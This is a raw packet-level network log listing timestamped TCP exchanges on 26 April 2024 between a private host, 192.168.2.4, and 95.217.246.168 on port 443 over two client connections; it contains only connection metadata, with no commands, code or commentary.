Apr 26, 2024 21:35:32.402302027 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:32.402307034 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:33.240382910 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:33.240448952 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:33.240458012 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:33.240482092 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:33.240514040 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:33.240530014 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:33.240551949 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:33.240567923 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:33.240585089 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:33.240606070 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:33.240617990 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:33.361344099 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:33.361402035 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:33.361424923 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:33.361458063 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:33.361474037 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:33.361498117 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:33.542793989 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:33.542862892 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:33.543025017 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:33.543025017 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:33.543050051 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:33.543103933 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:33.652421951 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:33.652450085 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:33.652648926 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:33.652648926 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:33.652662992 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:33.652712107 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:33.747647047 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:33.747668982 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:33.747744083 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:33.747757912 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:33.747793913 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:33.747814894 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:33.820682049 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:33.820702076 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:33.820911884 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:33.820911884 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:33.820935011 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:33.820983887 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:33.864809990 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:33.864829063 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:33.864928007 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:33.864943981 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:33.865145922 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:33.922173023 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:33.922189951 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:33.922257900 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:33.922276020 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:33.922310114 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:33.922322035 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:33.973086119 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:33.973104954 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:33.973148108 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:33.973177910 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:33.973181009 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:33.973297119 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.017203093 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.017226934 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.017276049 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.017288923 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.017322063 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.017335892 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.059509993 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.059529066 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.059587002 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.059603930 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.059617996 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.059667110 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.100964069 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.100980997 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.101063967 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.101078033 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.101121902 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.128326893 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.128344059 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.128401995 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.128417969 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.128464937 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.158314943 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.158335924 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.158376932 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.158392906 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.158427954 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.158443928 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.178275108 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.178292990 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.178350925 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.178366899 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.178416014 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.200404882 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.200424910 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.200485945 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.200500965 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.200539112 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.231363058 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.231379032 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.231497049 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.231509924 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.231559992 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.270049095 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.270076990 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.270169973 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.270181894 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.270394087 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.546099901 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.546113014 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.546154022 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.546314001 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.546314001 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.546331882 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.546377897 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.564820051 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.564836979 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.564898968 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.564929008 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.564943075 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.564964056 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.564964056 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565006018 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565016985 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565030098 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565041065 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565056086 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565072060 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565078974 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565108061 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565114975 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565123081 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565140009 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565150023 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565171003 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565175056 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565192938 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565205097 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565215111 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565236092 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565256119 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565272093 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565274000 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565288067 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565318108 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565339088 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565350056 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565359116 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565387964 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565393925 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565411091 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565414906 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565428019 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565443993 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565445900 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565485001 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565490961 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565501928 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565505981 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565527916 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565535069 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565540075 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565562963 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565581083 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565593958 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565597057 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565608025 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565633059 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565656900 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565663099 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565670013 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565695047 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565716982 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565721035 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565732002 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565737963 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565753937 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565757990 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565781116 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565785885 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565798044 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565809965 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565817118 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565829039 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565849066 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565855026 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565875053 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565875053 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565896988 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565902948 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565932035 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565943003 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565953970 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565975904 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565984964 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.565995932 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.565999985 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.566014051 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.566035986 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.566042900 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.566052914 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.566071987 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.566082954 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.566109896 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.566117048 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.566138983 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.566165924 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.566169024 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.566184998 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.566203117 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.566227913 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.566832066 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.571481943 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.571494102 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.641977072 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.642014980 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:34.642085075 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.642406940 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:34.642424107 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:35.180301905 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:35.181591034 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:35.182127953 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:35.182137012 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:35.182267904 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:35.182274103 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.028827906 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.028852940 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.028870106 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.028995991 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.028995991 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.029025078 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.029077053 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.150648117 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.150677919 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.150748014 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.150763988 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.150778055 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.150806904 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.335088015 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.335160971 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.335350990 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.335350990 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.335366011 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.335413933 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.453087091 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.453113079 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.453308105 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.453325033 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.453366041 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.542166948 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.542195082 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.542334080 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.542352915 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.542392969 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.611665964 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.611701965 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.611888885 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.611900091 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.612072945 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.658068895 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.658091068 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.658273935 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.658292055 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.658435106 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.715955973 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.715981960 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.716074944 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.716074944 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.716108084 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.716217041 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.774941921 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.774965048 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.775463104 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.775481939 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.775777102 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.817616940 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.817637920 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.817853928 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.817874908 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.818109035 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.855699062 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.855715990 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.855988979 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.855998993 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.856128931 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.888024092 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.888041973 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.888183117 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.888190985 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.888878107 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.920619965 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.920636892 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.920785904 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.920794010 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.920945883 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.946059942 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.946084976 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.946281910 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.946290970 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.946469069 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.969873905 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.969887972 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.970020056 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.970041037 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.970134020 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.995726109 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.995743036 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.995841026 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:36.995883942 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:36.996006966 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:37.015980005 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.016001940 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.016228914 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:37.016238928 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.016372919 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:37.038945913 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.038965940 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.039123058 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:37.039129972 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.039189100 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:37.058290958 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.058306932 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.058578968 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:37.058598042 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.059173107 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:37.079905033 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.079922915 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.080038071 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:37.080044985 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.080238104 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:37.098047018 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.098072052 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:37.098263025 CEST	49750	443	192.168.2.4	95.217.246.168
